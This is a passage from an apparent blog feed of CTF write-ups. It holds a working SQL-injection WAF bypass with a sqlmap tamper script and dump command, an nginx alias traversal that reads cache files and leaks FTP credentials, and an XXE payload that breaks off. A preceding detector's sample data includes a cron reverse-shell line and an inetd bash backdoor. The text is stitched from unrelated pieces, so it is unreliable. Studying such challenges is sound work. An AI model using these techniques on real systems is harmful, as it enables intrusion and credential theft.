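    "*/5 * * * * /usr/bin/python3 -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",233))'"
    "\r\rno crontab for www-data" + " " * 70 + "\n"
)
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "fdrag0n:x:0:0::/home/fdrag0n:/bin/bash\n"
    "ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash\n"
)
SAMPLE_INETD = (
    "#chargen dgram udp wait root internal\n"
    "#discard stream tcp nowait root internal\n"
    "daytime stream tcp nowait root /bin/bash bash -i\n"
    "ident stream tcp nowait identd /usr/sbin/identd identd\n"
)

if __name__ == "__main__":
    # Live host: open("/var/spool/cron/crontabs/root").read(), open("/etc/passwd").read(), ...
    for finding in find_hidden_cron_jobs(SAMPLE_CRONTAB):
        print("cron:", finding)
    print("uid0:", find_uid0_accounts(SAMPLE_PASSWD))
    print("inetd:", find_inetd_shells(SAMPLE_INETD))
```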
<summary type="html">
<h1 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>Test environment</h1><p>Ubuntu 16.04<br>Reverse shell target: 127.0.0.1:233</p>
<h1 id="cron定时反弹shell"><a href="#cron定时反弹shell" class="headerlink" title="cron定时反弹shell"></a>Scheduled reverse shell via cron</h1>
</summary>
<category term="linux" scheme="http://fdrag0n.github.io/tags/linux/"/>
</entry>
<entry>
<title>HCTF2018-Kzone</title>
<link href="http://fdrag0n.github.io/2018/10/19/HCTF2018-Kzone/"/>
<id>http://fdrag0n.github.io/2018/10/19/HCTF2018-Kzone/</id>
<published>2018-10-19T14:19:24.000Z</published>
<updated>2019-12-05T13:19:54.981Z</updated>
<content type="html"><![CDATA[<h1 id="Kzone"><a href="#Kzone" class="headerlink" title="Kzone"></a>Kzone</h1><p>A quick probe turns up a leaked backup, www.zip; download it and audit the source.</p><p>There is an admin panel.</p><p>Look at the source of /www/admin/login.php.</p><p>It includes the configuration file ../include/common.php:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">header(<span class="string">'Content-Type: text/html; charset=UTF-8'</span>);</span><br><span class="line">define(<span class="string">'IN_CRONLITE'</span>, <span class="keyword">true</span>);</span><br><span class="line">define(<span class="string">'ROOT'</span>, dirname(<span class="keyword">__FILE__</span>).<span class="string">'/'</span>);</span><br><span class="line">define(<span class="string">'LOGIN_KEY'</span>, <span class="string">'abchdbb679546'</span>);</span><br><span class="line">date_default_timezone_set(<span class="string">"PRC"</span>);</span><br><span class="line">$date = date(<span class="string">"Y-m-d H:i:s"</span>);</span><br><span class="line">session_start();</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">include</span> ROOT.<span class="string">'../config.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($port))$port=<span class="string">'3306'</span>;</span><br><span class="line"><span class="keyword">include_once</span>(ROOT.<span class="string">"db.class.php"</span>);</span><br><span class="line">$DB=<span class="keyword">new</span> DB($host,$user,$pwd,$dbname,$port);</span><br><span class="line"></span><br><span class="line">$password_hash=<span class="string">'!@#%!s!'</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">"safe.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"function.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"member.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"os.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"kill.intercept.php"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><a id="more"></a><p>common.php in turn requires safe.php, the site's WAF (note also the hard-coded <code>LOGIN_KEY</code>, which the cookie login below mixes into its hash):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> $blacklist = <span class="string">'/union|ascii|mid|left|greatest|least|substr|sleep|or|benchmark|like|regexp|if|=|-|<|>|\#|\s/i'</span>;</span><br><span class="line"> <span class="keyword">return</span> preg_replace_callback($blacklist, <span class="function"><span class="keyword">function</span> <span class="params">($match)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'@'</span> . $match[<span class="number">0</span>] . 
<span class="string">'@'</span>;</span><br><span class="line"> }, $string);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (is_array($string)) {</span><br><span class="line"> <span class="keyword">foreach</span> ($string <span class="keyword">as</span> $key => $val) {</span><br><span class="line"> $string[$key] = safe($val);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $string = waf($string);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $string;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_GET[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span> ($_POST <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_POST[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span> ($_COOKIE <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span 
class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_COOKIE[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">unset</span>($cplen, $key, $value);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The WAF is a blacklist: every case-insensitive match of union, ascii, mid, left, greatest, least, substr, sleep, or, benchmark, like, regexp, if, =, -, the two angle brackets, # or any whitespace in every non-numeric string in $_GET, $_POST and $_COOKIE is wrapped in @...@, which breaks the SQL. It runs on the raw request values, before the application does anything else with them.</p><p>Next, member.php, which decides whether the visitor is logged in as admin:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!defined(<span class="string">'IN_CRONLITE'</span>)) <span class="keyword">exit</span>();</span><br><span class="line">$islogin = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_COOKIE[<span class="string">"islogin"</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_COOKIE[<span 
class="string">"login_data"</span>]) {</span><br><span class="line"> $login_data = json_decode($_COOKIE[<span class="string">'login_data'</span>], <span class="keyword">true</span>);</span><br><span class="line"> $admin_user = $login_data[<span class="string">'admin_user'</span>];</span><br><span class="line"> $udata = $DB->get_row(<span class="string">"SELECT * FROM fish_admin WHERE username='$admin_user' limit 1"</span>);</span><br><span class="line"> <span class="keyword">if</span> ($udata[<span class="string">'username'</span>] == <span class="string">''</span>) {</span><br><span class="line"> setcookie(<span class="string">"islogin"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> setcookie(<span class="string">"login_data"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> }</span><br><span class="line"> $admin_pass = sha1($udata[<span class="string">'password'</span>] . 
LOGIN_KEY);</span><br><span class="line"> <span class="keyword">if</span> ($admin_pass == $login_data[<span class="string">'admin_pass'</span>]) {</span><br><span class="line"> $islogin = <span class="number">1</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> setcookie(<span class="string">"islogin"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> setcookie(<span class="string">"login_data"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">'islogin'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_SESSION[<span class="string">"admin_user"</span>]) {</span><br><span class="line"> $admin_user = base64_decode($_SESSION[<span class="string">'admin_user'</span>]);</span><br><span class="line"> $udata = $DB->get_row(<span class="string">"SELECT * FROM fish_admin WHERE username='$admin_user' limit 1"</span>);</span><br><span class="line"> $admin_pass = sha1($udata[<span class="string">'password'</span>] . 
LOGIN_KEY);</span><br><span class="line"> <span class="keyword">if</span> ($admin_pass == $_SESSION[<span class="string">"admin_pass"</span>]) {</span><br><span class="line"> $islogin = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>On line 6, <code>json_decode()</code> is applied to the login_data cookie after the WAF has already run over it, and its <code>admin_user</code> value goes straight into <code>SELECT * FROM fish_admin WHERE username='$admin_user' limit 1</code>. JSON decoding turns <code>\uXXXX</code> escapes back into characters, so the keywords and separators the WAF would have mangled (union, or, =, space, quotes) can be written as Unicode escapes, pass the blacklist untouched, and are restored before they reach the query. The query result is never echoed, so the injection is blind and sqlmap does the heavy lifting.</p><p>Capture a login request and add <code>islogin=1</code> and <code>login_data=*</code> to the Cookie header (the <code>*</code> marks the injection point for <code>sqlmap -r</code>):</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /admin/login.php HTTP/1.1</span><br><span class="line">Host: 206.189.144.143:10000</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://206.189.144.143:10000/admin/login.php</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 25</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=gu1u7fsbr0pub63546vot34163; islogin=1; login_data=*</span><br><span 
class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">user=1&pass=2&login=Login</span><br></pre></td></tr></table></figure><p>然后编写tamper</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line"> data = <span class="string">'''{"admin_user":"%s"};'''</span></span><br><span class="line"> payload = payload.lower()</span><br><span 
class="line"></span><br><span class="line"> <span class="comment"># emit literal \uXXXX escape sequences (doubled backslash so the same source works on Python 2 and 3); json_decode() turns them back into the original characters server-side</span></span><br><span class="line"> payload = payload.replace(<span class="string">'u'</span>, <span class="string">'\\u0075'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'o'</span>, <span class="string">'\\u006f'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'i'</span>, <span class="string">'\\u0069'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'\''</span>, <span class="string">'\\u0027'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'\"'</span>, <span class="string">'\\u0022'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">' '</span>, <span class="string">'\\u0020'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'s'</span>, <span class="string">'\\u0073'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'#'</span>, <span class="string">'\\u0023'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'>'</span>, <span class="string">'\\u003e'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'<'</span>, <span class="string">'\\u003c'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'-'</span>, <span class="string">'\\u002d'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'='</span>, <span class="string">'\\u003d'</span>)</span><br><span class="line"> <span class="comment"># restore the case of the table and column names that lower() changed above</span></span><br><span class="line"> payload = payload.replace(<span class="string">'f1a9'</span>, <span class="string">'F1a9'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'f1'</span>, <span class="string">'F1'</span>)</span><br><span class="line"> <span class="keyword">return</span> data % payload</span><br></pre></td></tr></table></figure><p>Run sqlmap with the tamper:</p><p><code>python .\sqlmap.py -r test.txt --tamper hctf -o --dbms mysql -D hctf_kouzone -T F1444g -C F1a9 --dump</code></p><p>Flag: <code>hctf{hctf_2018_kzone_Author_Li4n0}</code></p>]]></content>
<summary type="html">
<h1 id="Kzone"><a href="#Kzone" class="headerlink" title="Kzone"></a>Kzone</h1><p>A quick test found a leaked backup file, www.zip; download it and audit the code.</p>
<p>There is an admin backend.</p>
<p>Look at the source of login.php under /www/admin.</p>
<p>It includes the configuration file ../include/common.php:</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">header(<span class="string">'Content-Type: text/html; charset=UTF-8'</span>);</span><br><span class="line">define(<span class="string">'IN_CRONLITE'</span>, <span class="keyword">true</span>);</span><br><span class="line">define(<span class="string">'ROOT'</span>, dirname(<span class="keyword">__FILE__</span>).<span class="string">'/'</span>);</span><br><span class="line">define(<span class="string">'LOGIN_KEY'</span>, <span class="string">'abchdbb679546'</span>);</span><br><span class="line">date_default_timezone_set(<span class="string">"PRC"</span>);</span><br><span class="line">$date = date(<span class="string">"Y-m-d H:i:s"</span>);</span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> ROOT.<span class="string">'../config.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($port))$port=<span class="string">'3306'</span>;</span><br><span class="line"><span class="keyword">include_once</span>(ROOT.<span class="string">"db.class.php"</span>);</span><br><span class="line">$DB=<span class="keyword">new</span> DB($host,$user,$pwd,$dbname,$port);</span><br><span class="line"></span><br><span class="line">$password_hash=<span class="string">'!@#%!s!'</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">"safe.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"function.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"member.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"os.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"kill.intercept.php"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
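The bypass this writeup relies on, seen from the defender's side, as an added example (not the challenge's code): a keyword filter run on the raw login_data string never sees a keyword that was spelled with JSON backslash-u escapes, while the same filter run on the values after json.loads() does, which is why the check has to happen after decoding. The keyword list and the sample cookie value are constructed for this example.

```python
import json

# Constructed keyword list standing in for the challenge's WAF rules.
SQL_KEYWORDS = ("select", "union", "sleep", "benchmark", "'", "#")


def waf_raw(login_data):
    """Filter applied to the raw cookie text, before any JSON decoding.
    Returns the first keyword found, or None when the text looks clean."""
    lowered = login_data.lower()
    for kw in SQL_KEYWORDS:
        if kw in lowered:
            return kw
    return None


def waf_decoded(login_data):
    """Same filter, but applied to every string value after json.loads(),
    so backslash-u escapes have already been turned back into characters.
    Malformed JSON is reported rather than silently passed."""
    try:
        obj = json.loads(login_data)
    except ValueError:
        return "invalid-json"
    values = obj.values() if isinstance(obj, dict) else [obj]
    for value in values:
        if isinstance(value, str):
            hit = waf_raw(value)
            if hit is not None:
                return hit
    return None


def decoded_user(login_data):
    """What the application actually works with after json_decode()."""
    return json.loads(login_data)["admin_user"]


# Constructed cookie value: the keywords are spelled with JSON escapes, so
# the raw bytes contain neither "union", "select", the quote nor "#".
ESCAPED = r'{"admin_user":"admin\u0027 \u0075nion \u0073elect 1\u0023"}'
CLEAN = '{"admin_user":"admin"}'

if __name__ == "__main__":
    print("raw filter   :", waf_raw(ESCAPED))        # None: nothing matched
    print("decoded value:", decoded_user(ESCAPED))
    print("decoded check:", waf_decoded(ESCAPED))    # keyword is visible now
```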
</summary>
</entry>
<entry>
<title>SCTF2018 - The Secret of nginx writeup</title>
<link href="http://fdrag0n.github.io/2018/09/13/SCTF2018-nginx%E7%9A%84%E7%A7%98%E5%AF%86wp/"/>
<id>http://fdrag0n.github.io/2018/09/13/SCTF2018-nginx的秘密wp/</id>
<published>2018-09-13T14:19:24.000Z</published>
<updated>2019-12-05T13:20:08.088Z</updated>
<content type="html"><![CDATA[<h1 id="NGINX的秘密"><a href="#NGINX的秘密" class="headerlink" title="NGINX的秘密"></a>The Secret of NGINX</h1><p>An NGINX configuration flaw allows arbitrary file read: /static../etc/nginx/nginx.conf</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 
class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line">user www-data;</span><br><span 
class="line">worker_processes auto;</span><br><span class="line">pid /run/nginx.pid;</span><br><span class="line"></span><br><span class="line">events {</span><br><span class="line">worker_connections 768;</span><br><span class="line"># multi_accept on;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">http {</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Basic Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">sendfile on;</span><br><span class="line">tcp_nopush on;</span><br><span class="line">tcp_nodelay on;</span><br><span class="line">keepalive_timeout 65;</span><br><span class="line">types_hash_max_size 2048;</span><br><span class="line"># server_tokens off;</span><br><span class="line"></span><br><span class="line"># server_names_hash_bucket_size 64;</span><br><span class="line"># server_name_in_redirect off;</span><br><span class="line"></span><br><span class="line">include /etc/nginx/mime.types;</span><br><span class="line">default_type application/octet-stream;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># SSL Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE</span><br><span class="line">ssl_prefer_server_ciphers on;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Logging Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">#access_log /var/log/nginx/access.log;</span><br><span class="line">#error_log /var/log/nginx/error.log;</span><br><span class="line"></span><br><span class="line">##</span><br><span class="line"># Gzip Settings</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">gzip on;</span><br><span class="line">gzip_disable 
"msie6";</span><br><span class="line"></span><br><span class="line"># gzip_vary on;</span><br><span class="line"># gzip_proxied any;</span><br><span class="line"># gzip_comp_level 6;</span><br><span class="line"># gzip_buffers 16 8k;</span><br><span class="line"># gzip_http_version 1.1;</span><br><span class="line"># gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;</span><br><span class="line"></span><br><span class="line">proxy_cache_path /tmp/mycache levels=1:2 keys_zone=my_cache:10m max_size=10g inactive=30s use_temp_path=off;</span><br><span class="line"></span><br><span class="line">limit_conn_zone $binary_remote_addr zone=conn:10m;</span><br><span class="line">limit_req_zone $binary_remote_addr zone=allips:10m rate=2r/s;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">server {</span><br><span class="line"> listen 4455 default_server;</span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> location /static {</span><br><span class="line"> alias /home/;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location ~* \.(css|js|gif|png){</span><br><span class="line"> proxy_cache my_cache;</span><br><span class="line"> proxy_cache_valid 200 30s;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> proxy_ignore_headers Expires Cache-Control Set-Cookie;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> limit_conn conn 10;</span><br><span class="line"> proxy_pass http://bugweb.app:8000;</span><br><span class="line"> proxy_set_header Host $host:$server_port;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span 
class="line">##</span><br><span class="line"># Virtual Host Configs</span><br><span class="line">##</span><br><span class="line"></span><br><span class="line">include /etc/nginx/conf.d/*.conf;</span><br><span class="line">include /etc/nginx/sites-enabled/*;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#mail {</span><br><span class="line">## See sample authentication script at:</span><br><span class="line">## http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript</span><br><span class="line"># </span><br><span class="line">## auth_http localhost/auth.php;</span><br><span class="line">## pop3_capabilities "TOP" "USER";</span><br><span class="line">## imap_capabilities "IMAP4rev1" "UIDPLUS";</span><br><span class="line"># </span><br><span class="line">#server {</span><br><span class="line">#listen localhost:110;</span><br><span class="line">#protocol pop3;</span><br><span class="line">#proxy on;</span><br><span class="line">#}</span><br><span class="line"># </span><br><span class="line">#server {</span><br><span class="line">#listen localhost:143;</span><br><span class="line">#protocol imap;</span><br><span class="line">#proxy on;</span><br><span class="line">#}</span><br><span class="line">#}</span><br></pre></td></tr></table></figure><p>Caching is enabled, and responses for the four file types css|js|gif|png are cached.<br><a id="more"></a><br>See the documentation: <a href="http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path" target="_blank" rel="noopener">http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path</a> </p><p>From proxy_cache_path we know the cache files live under /tmp/mycache. proxy_cache_key, which defines the cache file name, is not set, so the default $scheme$proxy_host$request_uri is used: the file name is md5($scheme$proxy_host$request_uri). Because proxy_cache_path sets levels=1:2, each cache file sits two directories deep under /tmp/mycache: the first-level directory name is the last character of the MD5 hash, and the second-level directory name is the second- and third-to-last characters of the hash.</p><p>The hint also reveals that the routing is odd: requesting /editxxxxx is the same as requesting /edit, and likewise /write_plan/a.js is the same as /write_plan.</p><p>So construct <a href="http://149.129.103.103:4455/write_plan/a.js/" target="_blank" rel="noopener">http://149.129.103.103:4455/write_plan/a.js/</a> and submit it for the admin to visit.</p><p>The bot was down, so this had to be done by hand 😂</p><p>Working out the path is the trap here:</p><p>it is not md5(<a href="http://149.129.103.103:4455/write_plan/a.js/" target="_blank" rel="noopener">http://149.129.103.103:4455/write_plan/a.js/</a>)</p><p>but <strong>md5(<a href="http://bugweb.app:8000/write_plan/a.js/" target="_blank" rel="noopener">http://bugweb.app:8000/write_plan/a.js/</a>) </strong>== 6fcfa7b1e6bad837b70dc98c9b82b43b</p><p>So the path to request is <a href="http://149.129.103.103:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b" target="_blank" rel="noopener">http://149.129.103.103:4455/static../tmp/mycache/b/43/6fcfa7b1e6bad837b70dc98c9b82b43b</a></p><p>That cached response reveals the FTP username and password: syc10ver Eec5TN9fruOOTp2G.</p><p>Then use XXE to read the ARP table:</p><figure class="highlight plain"><figcaption><span>version</span></figcaption><table><tr><td class="code"><pre><span class="line"><?xml version="1.0" encoding="UTF-8"?></span><br><span class="line"><!DOCTYPE person [<!ENTITY remote SYSTEM</span><br><span 